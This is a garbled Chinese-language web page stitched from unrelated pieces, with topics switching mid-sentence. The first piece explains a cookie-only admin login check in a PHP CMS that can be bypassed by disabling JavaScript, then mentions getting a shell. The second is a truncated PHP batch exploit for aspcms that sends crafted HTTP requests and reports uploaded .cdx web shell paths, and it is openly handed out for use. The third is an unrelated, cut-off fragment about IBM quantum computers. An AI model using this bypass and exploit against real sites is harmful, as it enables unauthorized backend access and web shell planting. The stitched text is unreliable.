搜一次 cms php 通杀

漏洞文件 admin 目录下的 admin_loginstate.php 看代码 if(empty($_COOKIE['S_AdminID'])){ echo "<script>window.location='admin_login.php'</script>"; exit; } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){ echo "<script>window.parent.location='admin_login.php'</script>"; exit; } ?> 很简单的看出来是 cookie验证 我们直接禁止JS可直接进后台 进后台后简单的说下拿shell的

aspcms EXP 批量型

唉,没办法了,放手里也没用,给你们玩玩吧 <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); function http_send($host, $packet){ $sock = fsockopen($host, 80); if (!$sock) die("$errstr ($errno)\n"); fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); //print $resp; return $resp; } function connector_response($host,$html){ preg_match('/SetEditorContents\(\'Content\',\'(.*?)\'\)/',$html,$arr); if (strpos($arr[1],".cdx")){ print "\n[-] Get Shell: http://".$host."/".$arr[1]." \n"; Checkshell($host,$arr[1]); } else{ echo "\n[-] Exploit

IBM 超导量子计算机破记录

IBM超导量子比特的制备,是以硅为基质,采用铝和铌超导体进行,两个超导电极处于氧化铝绝缘体之间。 今天的量子计算机仅仅是实验。研究人员可以串起